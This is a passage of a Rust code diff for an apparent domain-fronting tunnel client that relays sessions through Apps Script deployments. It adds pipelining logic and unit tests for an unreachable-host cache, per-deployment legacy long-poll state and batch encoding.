+                                max_inflight = INFLIGHT_OPTIMIST.min(inflight_cap);
+                            } else if consecutive_data >= 2
+                                && max_inflight >= INFLIGHT_OPTIMIST
+                                && max_inflight < inflight_cap
+                                && total_download_bytes >= 32 * 1024
+                            {
+                                if !is_elevated {
+                                    let cur = mux.elevated_sessions.load(Ordering::Relaxed);
+                                    if cur < mux.max_elevated {
+                                        let n = mux.elevated_sessions.fetch_add(1, Ordering::Relaxed);
+                                        pipeline_debug::set_elevated(n + 1);
+                                        is_elevated = true;
+                                        max_inflight = (max_inflight + 1).min(inflight_cap);
+                                    }
+                                } else {
+                                    max_inflight = (max_inflight + 1).min(inflight_cap);
+                                }
+                            }
+                            pipeline_debug::session_update(sid, max_inflight, inflight.len(), is_elevated);
+                            if max_inflight != prev {
+                                tracing::info!(
+                                    "sess {}: pipeline {} -> {}{}",
+                                    &sid[..sid.len().min(8)],
+                                    prev,
+                                    max_inflight,
+                                    if is_elevated { " [elevated]" } else { "" },
+                                );
+                                pipeline_debug::push_event(format!(
+                                    "{} {}->{}{}",
+                                    &sid[..sid.len().min(8)],
+                                    prev,
+                                    max_inflight,
+                                    if is_elevated { " E" } else { "" },
+                                ));
+                            }
+                        }
+
+                        // Schedule refill if pipeline needs more polls.
+                        if !eof_seen
+                            && inflight.len() < max_inflight
+                            && refill_at.is_none()
+                        {
+                            refill_at = Some(Box::pin(tokio::time::sleep(
+                                if max_inflight > INFLIGHT_IDLE { Duration::from_millis(100) } else { Duration::ZERO }
+                            )));
+                            refill_steps = 0;
+                        }
+                    }
+                    ReplyOutcome::BatchErr(e) => {
+                        tracing::debug!("tunnel data error: {}", e);
+                        break;
+                    }
+                    ReplyOutcome::Timeout => {
+                        tracing::warn!(
+                            "sess {}: reply timeout (seq {}), retrying",
+                            &sid[..sid.len().min(8)],
+                            meta.seq,
+                        );
+                        consecutive_empty = consecutive_empty.saturating_add(1);
+                    }
+                    ReplyOutcome::Dropped => {
+                        break;
+                    }
+                }
+            }
+
+            // Read from client (overlapped with reply processing).
+            result = async {
+                read_buf.reserve(65536);
+                reader.read_buf(&mut read_buf).await
+            }, if can_read => {
+                match result {
+                    Ok(0) => {
+                        client_closed = true;
+                    }
+                    Ok(n) => {
+                        let data = extract_bytes(&mut read_buf, n);
+                        if inflight.len() < max_inflight {
+                            // Normal path: send immediately as data op.
+                            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                            consecutive_empty = 0;
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        } else if inflight.len() < max_inflight + 4 {
+                            // Fast-path: pipeline full but under +4 extra.
+                            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                            consecutive_empty = 0;
+                            inflight.push(wrap_reply(meta, reply_rx));
+                        } else {
+                            // Buffer upload data until a slot frees up.
+                            if let Some(ref mut existing) = buffered_upload {
+                                // Merge: append new data to existing buffer.
+                                let mut merged = BytesMut::with_capacity(existing.len() + data.len());
+                                merged.extend_from_slice(existing);
+                                merged.extend_from_slice(&data);
+                                *existing = merged.freeze();
+                            } else {
+                                buffered_upload = Some(data);
+                            }
+                        }
+                    }
+                    Err(_) => {
+                        client_closed = true;
+                    }
+                }
+            }
         }
     }
 
+    // Release elevation permit.
+    if is_elevated {
+        let n = mux.elevated_sessions.fetch_sub(1, Ordering::Relaxed);
+        pipeline_debug::set_elevated(n.saturating_sub(1));
+    }
     Ok(())
 }
 
@@ -982,6 +1922,20 @@ where
     }
 }
 
+/// Hand the bytes just read into `buf` to the caller as an owned `Bytes`.
+/// Reads below 32 KiB are copied out and `buf` is cleared for reuse; larger
+/// reads detach the buffer's whole contents with `split().freeze()` instead.
+fn extract_bytes(buf: &mut BytesMut, n: usize) -> Bytes {
+    const ZERO_COPY_THRESHOLD: usize = 65536 / 2;
+    // Small read: copy the first `n` bytes, then empty the buffer.
+    if n < ZERO_COPY_THRESHOLD {
+        let copied = Bytes::copy_from_slice(&buf[..n]);
+        buf.clear();
+        return copied;
+    }
+    buf.split().freeze()
+}
+
 pub fn decode_udp_packets(resp: &TunnelResponse) -> Result<Vec<Vec<u8>>, String> {
     let Some(pkts) = resp.pkts.as_ref() else {
         return Ok(Vec::new());
@@ -1010,6 +1964,7 @@ mod tests {
             eof: None,
             e: e.map(str::to_string),
             code: code.map(str::to_string),
+            seq: None,
         }
     }
 
@@ -1069,6 +2024,133 @@ mod tests {
         )));
     }
 
+    #[test]
+    fn unreachable_error_str_matches_expected_variants() {
+        // All must match; the upper-cased sample checks case-insensitivity.
+        for msg in [
+            "connect failed: Network is unreachable (os error 101)",
+            "No route to host",
+            "os error 113",
+            "CONNECT FAILED: NETWORK IS UNREACHABLE",
+        ] {
+            assert!(is_unreachable_error_str(msg));
+        }
+    }
+
+    #[test]
+    fn unreachable_error_str_rejects_unrelated() {
+        // Other connect failures — and the empty string — must not match.
+        for msg in ["connection refused", "connect timed out", "connection reset by peer", ""] {
+            assert!(!is_unreachable_error_str(msg));
+        }
+    }
+
+    #[test]
+    fn negative_cache_records_and_short_circuits() {
+        let (mux, _rx) = mux_for_test();
+        // A fresh mux reports the (host, port) pair as not unreachable.
+        assert!(!mux.is_unreachable("ds6.probe.example", 443));
+        // Record an unreachable-class error string for that pair.
+        mux.record_unreachable_if_match(
+            "ds6.probe.example",
+            443,
+            "connect failed: Network is unreachable (os error 101)",
+        );
+        assert!(mux.is_unreachable("ds6.probe.example", 443));
+        // Entries are per (host, port): port 80 on the same host must miss.
+        assert!(!mux.is_unreachable("ds6.probe.example", 80));
+    }
+
+    #[test]
+    fn negative_cache_ignores_non_unreachable_errors() {
+        // "connection refused" is not an unreachable-class failure, so
+        // recording it must leave the (host, port) pair out of the cache.
+        let (mux, _rx) = mux_for_test();
+        let host = "example.com";
+        let refused = "connect failed: connection refused";
+        mux.record_unreachable_if_match(host, 443, refused);
+        assert!(!mux.is_unreachable(host, 443));
+    }
+
+    #[test]
+    fn negative_cache_normalizes_host_keys() {
+        let (mux, _rx) = mux_for_test();
+        // Record under a mixed-case host name with a trailing dot...
+        mux.record_unreachable_if_match(
+            "Example.COM.",
+            443,
+            "Network is unreachable (os error 101)",
+        );
+        // ...then expect hits for other casings, with or without the dot.
+        assert!(mux.is_unreachable("example.com", 443));
+        assert!(mux.is_unreachable("EXAMPLE.com", 443));
+        assert!(mux.is_unreachable("example.com.", 443));
+        // A genuinely different host must still miss.
+        assert!(!mux.is_unreachable("other.com", 443));
+    }
+
+    /// Outer `Ok(Err(_))` from the mux channel means "the relay never
+    /// reached the tunnel-node" (HTTP/TLS to Apps Script failed, batch
+    /// timed out, etc.) — the destination wasn't even attempted. Even if
+    /// that error string contains "Network is unreachable" (e.g. the
+    /// client device's WAN was momentarily down), it must NOT poison the
+    /// destination cache, or every host the user touched during a
+    /// connectivity blip stays refused until its cache entry expires.
+    #[tokio::test]
+    async fn negative_cache_skips_outer_relay_errors() {
+        let (mux, mut rx) = mux_for_test();
+        let mux_for_task = mux.clone();
+        let task = tokio::spawn(async move {
+            connect_plain("real.target.example", 443, &mux_for_task).await
+        });
+
+        // Take the Connect message off the channel and answer it with an
+        // outer Err whose text `is_unreachable_error_str` would match.
+        let msg = rx.recv().await.expect("connect msg");
+        let reply = match msg {
+            MuxMsg::Connect { reply, .. } => reply,
+            other => panic!("expected Connect, got {:?}", std::mem::discriminant(&other)),
+        };
+        let _ = reply.send(Err(
+            "relay failed: Network is unreachable (os error 101)".into(),
+        ));
+
+        let res = task.await.expect("task");
+        assert!(res.is_err(), "connect_plain should surface the error");
+        assert!(
+            !mux.is_unreachable("real.target.example", 443),
+            "outer relay error must not negative-cache the destination"
+        );
+    }
+
+    #[test]
+    fn negative_cache_enforces_hard_cap_under_unique_burst() {
+        let (mux, _rx) = mux_for_test();
+        // Burst of unique, still-live entries past the cap: nothing has
+        // expired, so `retain(expired)` prunes nothing and only the hard
+        // cap can keep the map at or below UNREACHABLE_CACHE_MAX.
+        let burst = UNREACHABLE_CACHE_MAX + 50;
+        for i in 0..burst {
+            let host = format!("h{}.example", i);
+            mux.record_unreachable_if_match(
+                &host,
+                443,
+                "connect failed: Network is unreachable (os error 101)",
+            );
+        }
+        let len = mux
+            .unreachable_cache
+            .lock()
+            .expect("unreachable_cache mutex poisoned; size check would be vacuous")
+            .len();
+        assert!(
+            len <= UNREACHABLE_CACHE_MAX,
+            "cache size {} exceeded cap {}",
+            len,
+            UNREACHABLE_CACHE_MAX
+        );
+    }
+
     #[test]
     fn server_speaks_first_covers_common_protocols() {
         for p in [21u16, 22, 25, 80, 110, 143, 587] {
@@ -1090,22 +2172,80 @@ mod tests {
     /// Build a TunnelMux whose send channel is exposed to the test rather
     /// than wired to a real DomainFronter. Lets tests assert what messages
     /// the client would emit without needing network or apps_script.
-    fn mux_for_test() -> (Arc<TunnelMux>, mpsc::Receiver<MuxMsg>) {
-        let (tx, rx) = mpsc::channel(16);
+    fn mux_for_test() -> (Arc<TunnelMux>, mpsc::UnboundedReceiver<MuxMsg>) {
+        mux_for_test_with(2) // default fixture: two deployments
+    }
+
+    /// Build a test TunnelMux that models `num_scripts` deployments. The
+    /// per-deployment legacy state's aggregate gate (`all_servers_legacy`)
+    /// requires `legacy_deployments.len() == num_scripts`, so tests that
+    /// exercise that gate need to control how many "deployments" exist.
+    fn mux_for_test_with(num_scripts: usize) -> (Arc<TunnelMux>, mpsc::UnboundedReceiver<MuxMsg>) {
+        let (tx, rx) = mpsc::unbounded_channel();
         let mux = Arc::new(TunnelMux {
             tx,
             connect_data_unsupported: Arc::new(AtomicBool::new(false)),
-            server_no_longpoll: Arc::new(AtomicBool::new(false)),
+            legacy_deployments: Mutex::new(HashMap::new()),
+            all_legacy: Arc::new(AtomicBool::new(false)),
+            num_scripts,
             preread_win: AtomicU64::new(0),
             preread_loss: AtomicU64::new(0),
             preread_skip_port: AtomicU64::new(0),
             preread_skip_unsupported: AtomicU64::new(0),
             preread_win_total_us: AtomicU64::new(0),
             preread_total_events: AtomicU64::new(0),
+            unreachable_cache: Mutex::new(HashMap::new()),
+            // Fixed, generous value for the tests that exercise the
+            // reply-timeout path; production instead derives it from
+            // `fronter.batch_timeout()` (see `TunnelMux::start`).
+            reply_timeout: Duration::from_secs(35),
+            elevated_sessions: AtomicU64::new(0),
+            max_elevated: MAX_ELEVATED_PER_DEPLOYMENT * num_scripts as u64,
         });
         (mux, rx)
     }
 
+    /// `TunnelMux::reply_timeout` must co-vary with the configured
+    /// `request_timeout_secs` plus `REPLY_TIMEOUT_SLACK`. Without this
+    /// runtime derivation, operators who raise `request_timeout_secs`
+    /// see sessions abandon `reply_rx` just before `fire_batch`'s
+    /// HTTP round-trip would have completed — silently orphaning
+    /// in-flight responses. The test muxes hardcode a value for
+    /// convenience, so a regression in `TunnelMux::start`'s formula
+    /// could ship unnoticed unless we exercise the real construction
+    /// path.
+    #[tokio::test]
+    async fn mux_reply_timeout_tracks_batch_timeout_plus_slack() {
+        use crate::config::Config;
+
+        // Configure a non-default `request_timeout_secs` so that a
+        // hardcoded timeout (35 s in the test muxes, 75 s in the previous
+        // patch) would not satisfy the assertion below.
+        let cfg: Config = serde_json::from_str(
+            r#"{
+                "mode": "apps_script",
+                "google_ip": "127.0.0.1",
+                "front_domain": "www.google.com",
+                "script_id": "TEST",
+                "auth_key": "test_auth_key",
+                "listen_host": "127.0.0.1",
+                "listen_port": 8085,
+                "log_level": "info",
+                "verify_ssl": true,
+                "request_timeout_secs": 60
+            }"#,
+        )
+        .unwrap();
+        let fronter = Arc::new(DomainFronter::new(&cfg).expect("test fronter must construct"));
+        let mux = TunnelMux::start(fronter, 0, 0);
+
+        assert_eq!(
+            mux.reply_timeout(),
+            Duration::from_secs(60) + REPLY_TIMEOUT_SLACK,
+            "reply_timeout must equal batch_timeout + REPLY_TIMEOUT_SLACK"
+        );
+    }
+
     /// The buffered ClientHello from the pre-read window must reach the
     /// tunnel-node as the first `Data` op on the fallback path. If this
     /// regresses, every TLS handshake stalls until the 30 s read-timeout
@@ -1122,14 +2262,17 @@ mod tests {
         let addr = listener.local_addr().unwrap();
         let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 });
         let _client = TcpStream::connect(addr).await.unwrap();
-        let mut server_side = accept.await.unwrap();
+        let server_side = accept.await.unwrap();
 
         let (mux, mut rx) = mux_for_test();
-        let pending = Some(b"CLIENTHELLO".to_vec());
+        let pending = Some(Bytes::from_static(b"CLIENTHELLO"));
 
         let loop_handle = tokio::spawn({
             let mux = mux.clone();
-            async move { tunnel_loop(&mut server_side, "sid-under-test", &mux, pending).await }
+            async move {
+                let mut server_side = server_side;
+                tunnel_loop(&mut server_side, "sid-under-test", &mux, pending).await
+            }
         });
 
         // The first message tunnel_loop emits must be Data carrying the
@@ -1140,18 +2283,22 @@ mod tests {
             .expect("mux channel closed unexpectedly");
 
         match msg {
-            MuxMsg::Data { sid, data, reply } => {
+            MuxMsg::Data { sid, data, reply, .. } => {
                 assert_eq!(sid, "sid-under-test");
                 assert_eq!(&data[..], b"CLIENTHELLO");
                 // Reply with eof so tunnel_loop unwinds cleanly.
-                let _ = reply.send(Ok(TunnelResponse {
-                    sid: Some("sid-under-test".into()),
-                    d: None,
-                    pkts: None,
-                    eof: Some(true),
-                    e: None,
-                    code: None,
-                }));
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-under-test".into()),
+                        d: None,
+                        pkts: None,
+                        eof: Some(true),
+                        e: None,
+                        code: None,
+                        seq: Some(0),
+                    },
+                    "test-script".to_string(),
+                )));
             }
             other => panic!(
                 "first mux message was not Data (expected replay); got {:?}",
@@ -1166,6 +2313,106 @@ mod tests {
             ),
         }
 
+        // With pipelining (INFLIGHT_OPTIMIST=2), the second op is
+        // launched after a 1 s stagger sleep, so we need to wait long
+        // enough for it to arrive. Reply to any remaining messages so the
+        // loop can exit cleanly.
+        let mut seq = 1u64;
+        while let Ok(Some(msg)) = tokio::time::timeout(Duration::from_millis(1500), rx.recv()).await {
+            if let MuxMsg::Data { reply, .. } = msg {
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-under-test".into()),
+                        d: None, pkts: None, eof: Some(true),
+                        e: None, code: None, seq: Some(seq),
+                    },
+                    "test-script".to_string(),
+                )));
+                seq += 1;
+            }
+        }
+
+        let _ = tokio::time::timeout(Duration::from_secs(4), loop_handle)
+            .await
+            .expect("tunnel_loop did not exit after eof");
+    }
+
+    /// Regression for the mixed-mode stall: A is legacy, B is long-poll
+    /// capable, the session's last reply came from A. A naive per-
+    /// deployment skip (gated on the *previous* reply's `script_id`)
+    /// would short-circuit every empty poll on this session — so B
+    /// never gets a chance to long-poll for us, and remote→client data
+    /// stalls until either the local client sends bytes or A's TTL
+    /// expires. The fix gates skip-when-idle on the aggregate
+    /// `all_servers_legacy()` instead, so the loop keeps emitting empty
+    /// polls whenever at least one peer can still hold the request open.
+    /// Replies are paced via `start_paused` time auto-advance — without
+    /// it the test would take ~2 s of real wall-clock time per session.
+    #[tokio::test(start_paused = true)]
+    async fn tunnel_loop_keeps_polling_when_only_some_deployments_legacy() {
+        use tokio::net::TcpListener;
+
+        let listener = TcpListener::bind(("127.0.0.1", 0)).await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 });
+        let _client = TcpStream::connect(addr).await.unwrap();
+        let server_side = accept.await.unwrap();
+
+        // 2 deployments, only A marked legacy → all_servers_legacy = false.
+        let (mux, mut rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+        assert!(!mux.all_servers_legacy());
+
+        let loop_handle = tokio::spawn({
+            let mux = mux.clone();
+            async move {
+                let mut server_side = server_side;
+                tunnel_loop(&mut server_side, "sid-mixed", &mux, None).await
+            }
+        });
+
+        // Reply to 6 empty polls, all from A. With the regression
+        // (per-deployment skip on `last_script_id == A`), the loop would
+        // stop emitting at iteration 4 — `consecutive_empty > 3` plus
+        // `last_was_legacy` would short-circuit the send. With the fix,
+        // the aggregate gate stays false and the loop keeps polling.
+        // The 60 s timeout below is paused-time, so it only "elapses"
+        // if rx.recv() truly never resolves (i.e. the loop has stalled).
+        let mut received = 0u32;
+        while received < 6 {
+            let msg = tokio::time::timeout(Duration::from_secs(60), rx.recv())
+                .await
+                .unwrap_or_else(|_| panic!(
+                    "loop stopped emitting at iteration {} — regression: per-deployment skip-when-idle stalled session even though long-poll-capable peer was available",
+                    received
+                ))
+                .expect("mux channel closed unexpectedly");
+            match msg {
+                MuxMsg::Data { sid, data, seq, reply, .. } => {
+                    assert_eq!(sid, "sid-mixed");
+                    assert!(data.is_empty(), "expected empty poll, got {} bytes", data.len());
+                    let last = received == 5;
+                    let _ = reply.send(Ok((
+                        TunnelResponse {
+                            sid: Some("sid-mixed".into()),
+                            d: None,
+                            pkts: None,
+                            eof: if last { Some(true) } else { None },
+                            e: None,
+                            code: None,
+                            seq,
+                        },
+                        "script-A".to_string(),
+                    )));
+                    received += 1;
+                }
+                _ => panic!(
+                    "iteration {}: expected Data poll, got a different MuxMsg variant",
+                    received
+                ),
+            }
+        }
+
         let _ = tokio::time::timeout(Duration::from_secs(2), loop_handle)
             .await
             .expect("tunnel_loop did not exit after eof");
@@ -1185,19 +2432,316 @@ mod tests {
         assert!(mux.connect_data_unsupported());
     }
 
-    /// `server_no_longpoll` must be sticky too: once we see a legacy
-    /// fast-empty reply, every subsequent session uses the legacy idle
-    /// cadence (long read timeout + skip-empty) for the rest of the
-    /// process. Flipping it back per-session would either thrash the
-    /// cadence or double the detection cost.
+    /// Marking deployment A as legacy must NOT make B look legacy. This
+    /// is the central guarantee of the per-deployment design: with the
+    /// old global AtomicBool, one slow / legacy deployment dragged every
+    /// session onto the legacy cadence even when every other deployment
+    /// was long-polling fine.
     #[test]
-    fn no_longpoll_cache_is_sticky() {
-        let (mux, _rx) = mux_for_test();
-        assert!(!mux.server_no_longpoll());
-        mux.mark_server_no_longpoll();
-        assert!(mux.server_no_longpoll());
-        mux.mark_server_no_longpoll(); // idempotent
-        assert!(mux.server_no_longpoll());
+    fn legacy_state_is_per_deployment() {
+        let (mux, _rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+
+        let deps = mux.legacy_deployments.lock().unwrap();
+        assert!(deps.contains_key("script-A"));
+        assert!(
+            !deps.contains_key("script-B"),
+            "marking A must not insert an entry for B"
+        );
+    }
+
+    /// `all_servers_legacy` (the per-session 30 s read-timeout gate) flips
+    /// to true *only* once every known deployment has been marked. With
+    /// 2 deployments, marking one keeps the gate false; marking both
+    /// flips it true, and re-marking afterwards leaves it true.
+    #[test]
+    fn all_servers_legacy_requires_every_deployment() {
+        let (mux, _rx) = mux_for_test_with(2);
+        assert!(!mux.all_servers_legacy());
+
+        mux.mark_server_no_longpoll("script-A");
+        assert!(
+            !mux.all_servers_legacy(),
+            "1 of 2 marked: aggregate must stay false"
+        );
+
+        mux.mark_server_no_longpoll("script-B");
+        assert!(
+            mux.all_servers_legacy(),
+            "all deployments marked: aggregate flips true"
+        );
+
+        // Marking an already-legacy deployment again is idempotent: the
+        // aggregate stays true.
+        mux.mark_server_no_longpoll("script-A");
+        assert!(mux.all_servers_legacy());
+    }
+
+    /// After `LEGACY_RECOVER_AFTER`, an entry is treated as expired and
+    /// the deployment rejoins the long-poll fast path. The next mark
+    /// (against any deployment) sweeps stale entries before recomputing
+    /// the aggregate gate, so a recovered peer doesn't keep counting
+    /// toward `all_legacy`. Backdating the mark time avoids really waiting
+    /// out `LEGACY_RECOVER_AFTER` — same effect as the clock moving on.
+    #[test]
+    fn legacy_state_recovers_after_ttl() {
+        let (mux, _rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+
+        // Overwrite A's mark with a timestamp one second older than the
+        // TTL, then mark B; B's mark must sweep out the stale A entry.
+        {
+            let mut deps = mux.legacy_deployments.lock().unwrap();
+            let stale = Instant::now()
+                .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1))
+                .expect("test environment should have a non-trivial monotonic clock");
+            deps.insert("script-A".to_string(), stale);
+        }
+        mux.mark_server_no_longpoll("script-B");
+
+        let deps = mux.legacy_deployments.lock().unwrap();
+        assert!(
+            !deps.contains_key("script-A"),
+            "expired entry must be swept on the next mark — otherwise stale legacy state never clears"
+        );
+        assert!(deps.contains_key("script-B"));
+    }
+
+    /// When every deployment has been marked legacy and the marks then
+    /// age past `LEGACY_RECOVER_AFTER` *with no further mark arriving*,
+    /// the very next `all_servers_legacy()` call must report `false`.
+    /// If stale marks were not discounted on read, the 30 s read-timeout
+    /// would stay active forever, even after every deployment has
+    /// recovered.
+    #[test]
+    fn all_servers_legacy_self_corrects_when_entries_expire() {
+        let (mux, _rx) = mux_for_test_with(2);
+        mux.mark_server_no_longpoll("script-A");
+        mux.mark_server_no_longpoll("script-B");
+        assert!(mux.all_servers_legacy());
+
+        // Rewrite every mark's timestamp to one second beyond the TTL.
+        {
+            let expired_at = Instant::now()
+                .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1))
+                .expect("monotonic clock should be far enough along");
+            let mut marks = mux.legacy_deployments.lock().unwrap();
+            for marked_at in marks.values_mut() {
+                *marked_at = expired_at;
+            }
+        }
+
+        assert!(
+            !mux.all_servers_legacy(),
+            "aggregate must self-correct when all entries expire — otherwise the 30 s read timeout sticks forever"
+        );
+    }
+
+    #[test]
+    fn should_fire_first_op_never_fires() {
+        // Empty accumulator (no ops, no bytes queued): there is nothing
+        // to fire yet, so even an op larger than the whole payload cap
+        // must not fire — it simply becomes the next batch's only op.
+        assert!(!should_fire(0, 0, 0));
+        assert!(!should_fire(0, 0, MAX_BATCH_PAYLOAD_BYTES + 1_000_000));
+    }
+
+    #[test]
+    fn should_fire_at_max_ops_threshold() {
+        // One op short of MAX_BATCH_OPS queued: the new op still fits.
+        assert!(!should_fire(MAX_BATCH_OPS - 1, 0, 100));
+        // MAX_BATCH_OPS already queued: the batch is full, so fire first.
+        assert!(should_fire(MAX_BATCH_OPS, 0, 100));
+        // Queued count already beyond the cap: must fire as well.
+        assert!(should_fire(MAX_BATCH_OPS + 5, 0, 100));
+    }
+
+    #[test]
+    fn should_fire_when_payload_would_exceed_cap() {
+        // Queued + new bytes landing exactly on the cap is fine (strict `>`).
+        assert!(!should_fire(
+            10,
+            MAX_BATCH_PAYLOAD_BYTES - 100,
+            100,
+        ));
+        // One byte over: fire.
+        assert!(should_fire(
+            10,
+            MAX_BATCH_PAYLOAD_BYTES - 100,
+            101,
+        ));
+        // Queued bytes already at the cap: a single extra byte must fire.
+        assert!(should_fire(
+            10,
+            MAX_BATCH_PAYLOAD_BYTES,
+            1,
+        ));
+    }
+
+    /// Reply indices must point at the slot the op occupies *within its
+    /// batch*. Pre-flush ops are 0..N-1 in batch A; post-flush ops
+    /// restart at 0 in batch B. If this regresses, `fire_batch`'s
+    /// `batch_resp.r.get(idx)` lookup hands the wrong response (or
+    /// `None`) to the wrong session — silent data corruption that
+    /// the encode-layer tests can't catch.
+    #[tokio::test]
+    async fn batch_accum_reindexes_after_flush() {
+        // Stand-alone helper that mirrors `push_or_fire`'s push step
+        // without the fire_batch call — lets us simulate a flush with
+        // `mem::take` and assert the post-flush indexing without
+        // mocking the whole tunnel_request stack.
+        fn push_no_fire(
+            accum: &mut BatchAccum,
+            op: PendingOp,
+            op_bytes: usize,
+            reply: BatchedReply,
+        ) {
+            let idx = accum.pending_ops.len();
+            accum.pending_ops.push(op);
+            accum.data_replies.push((idx, reply));
+            accum.payload_bytes += op_bytes;
+        }
+
+        let mk_op = |sid: &str| PendingOp {
+            op: "data",
+            sid: Some(sid.into()),
+            host: None,
+            port: None,
+            data: Some(Bytes::from_static(b"x")),
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        let mk_reply = || oneshot::channel::<Result<(TunnelResponse, String), String>>().0;
+
+        let mut accum = BatchAccum::new();
+
+        // Batch A: 3 ops at indices 0, 1, 2.
+        push_no_fire(&mut accum, mk_op("a0"), 4, mk_reply());
+        push_no_fire(&mut accum, mk_op("a1"), 4, mk_reply());
+        push_no_fire(&mut accum, mk_op("a2"), 4, mk_reply());
+        assert_eq!(accum.pending_ops.len(), 3);
+        assert_eq!(
+            accum.data_replies.iter().map(|(i, _)| *i).collect::<Vec<_>>(),
+            vec![0, 1, 2],
+        );
+        assert_eq!(accum.payload_bytes, 12);
+
+        // Simulate the flush: take the queued state and reset the byte
+        // counter (matches what `push_or_fire` does after `fire_batch`).
+        let _flushed_ops = std::mem::take(&mut accum.pending_ops);
+        let _flushed_replies = std::mem::take(&mut accum.data_replies);
+        accum.payload_bytes = 0;
+
+        // Batch B: 2 ops, indices restart at 0.
+        push_no_fire(&mut accum, mk_op("b0"), 4, mk_reply());
+        push_no_fire(&mut accum, mk_op("b1"), 4, mk_reply());
+        assert_eq!(accum.pending_ops.len(), 2);
+        assert_eq!(
+            accum.data_replies.iter().map(|(i, _)| *i).collect::<Vec<_>>(),
+            vec![0, 1],
+            "post-flush indices must restart at 0 — otherwise fire_batch's \
+             batch_resp.r.get(idx) returns None and every session in the \
+             second batch sees a missing-response error"
+        );
+        assert_eq!(accum.payload_bytes, 8);
+    }
+
+    #[test]
+    fn encode_pending_data_op_with_payload_emits_base64() {
+        let op = PendingOp {
+            op: "data",
+            sid: Some("sid-1".into()),
+            host: None,
+            port: None,
+            data: Some(Bytes::from_static(b"hello")),
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        let b = encode_pending(op);
+        assert_eq!(b.op, "data");
+        assert_eq!(b.sid.as_deref(), Some("sid-1"));
+        assert_eq!(b.d.as_deref(), Some(B64.encode(b"hello").as_str()));
+    }
+
+    #[test]
+    fn encode_pending_omits_d_for_empty_polls_and_close() {
+        // Empty-poll Data: mux_loop converts empty Bytes to data: None.
+        let empty_poll = PendingOp {
+            op: "data",
+            sid: Some("sid-2".into()),
+            host: None,
+            port: None,
+            data: None,
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        assert!(encode_pending(empty_poll).d.is_none());
+
+        // UDP poll with no payload: same shape.
+        let udp_poll = PendingOp {
+            op: "udp_data",
+            sid: Some("sid-3".into()),
+            host: None,
+            port: None,
+            data: None,
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        assert!(encode_pending(udp_poll).d.is_none());
+
+        // Close has no data and no reply — `d` must stay omitted.
+        let close = PendingOp {
+            op: "close",
+            sid: Some("sid-4".into()),
+            host: None,
+            port: None,
+            data: None,
+            encode_empty: false,
+            seq: None,
+            wseq: None,
+        };
+        assert!(encode_pending(close).d.is_none());
+    }
+
+    #[test]
+    fn encode_pending_connect_data_emits_empty_string_when_data_is_empty() {
+        // Defensive: ConnectData's wire contract is that `d` is always
+        // present (its presence is the signal that the caller is opting
+        // into the bundled-first-bytes flow). If an empty Bytes ever
+        // reaches the encoder, we must serialize `d: ""` not omit it.
+        let op = PendingOp {
+            op: "connect_data",
+            sid: None,
+            host: Some("example.com".into()),
+            port: Some(443),
+            data: Some(Bytes::new()),
+            encode_empty: true,
+            seq: None,
+            wseq: None,
+        };
+        let b = encode_pending(op);
+        assert_eq!(b.op, "connect_data");
+        assert_eq!(b.d.as_deref(), Some(""));
+    }
+
+    #[test]
+    fn encode_pending_connect_data_with_payload_encodes_normally() {
+        let op = PendingOp {
+            op: "connect_data",
+            sid: None,
+            host: Some("example.com".into()),
+            port: Some(443),
+            data: Some(Bytes::from_static(b"\x16\x03\x01")), // ClientHello prefix
+            encode_empty: true,
+            seq: None,
+            wseq: None,
+        };
+        let b = encode_pending(op);
+        assert_eq!(b.d.as_deref(), Some(B64.encode(b"\x16\x03\x01").as_str()));
     }
 
     #[test]
@@ -1219,4 +2763,107 @@ mod tests {
         // Five record_* calls, so trigger counter is at 5.
         assert_eq!(mux.preread_total_events.load(Ordering::Relaxed), 5);
     }
+
+    /// Client data written to the socket *during* the reply wait must be
+    /// buffered and sent in a subsequent op — not blocked until the reply
+    /// arrives and a fresh read-timeout elapses.
+    #[tokio::test]
+    async fn tunnel_loop_reads_client_during_reply_wait() {
+        use tokio::io::AsyncWriteExt;
+        use tokio::net::TcpListener;
+
+        let listener = TcpListener::bind(("127.0.0.1", 0)).await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let accept = tokio::spawn(async move { listener.accept().await.unwrap().0 });
+        let mut client = TcpStream::connect(addr).await.unwrap();
+        let server_side = accept.await.unwrap();
+
+        let (mux, mut rx) = mux_for_test();
+
+        let loop_handle = tokio::spawn({
+            let mux = mux.clone();
+            async move {
+                let mut server_side = server_side;
+                tunnel_loop(&mut server_side, "sid-overlap", &mux, None).await
+            }
+        });
+
+        // With pipelining (N=2), the loop may send two ops before we
+        // can write client data. Collect all initial ops, reply to each,
+        // then write data and check a subsequent op carries it.
+        let mut pending_replies: Vec<BatchedReply> = Vec::new();
+        let mut seq: u64 = 0;
+
+        // Drain initial ops (up to N=2).
+        while let Ok(Some(msg)) = tokio::time::timeout(Duration::from_millis(500), rx.recv()).await {
+            if let MuxMsg::Data { reply, .. } = msg {
+                pending_replies.push(reply);
+            }
+            if pending_replies.len() >= INFLIGHT_ACTIVE { break; }
+        }
+
+        // Write client data while replies are pending.
+        client.write_all(b"UPLOAD_DATA").await.unwrap();
+        client.flush().await.unwrap();
+        tokio::time::sleep(Duration::from_millis(50)).await;
+
+        // Reply to all pending ops (no eof, no data).
+        for reply in pending_replies.drain(..) {
+            let _ = reply.send(Ok((
+                TunnelResponse {
+                    sid: Some("sid-overlap".into()),
+                    d: None, pkts: None, eof: None,
+                    e: None, code: None, seq: Some(seq),
+                },
+                "test-script".to_string(),
+            )));
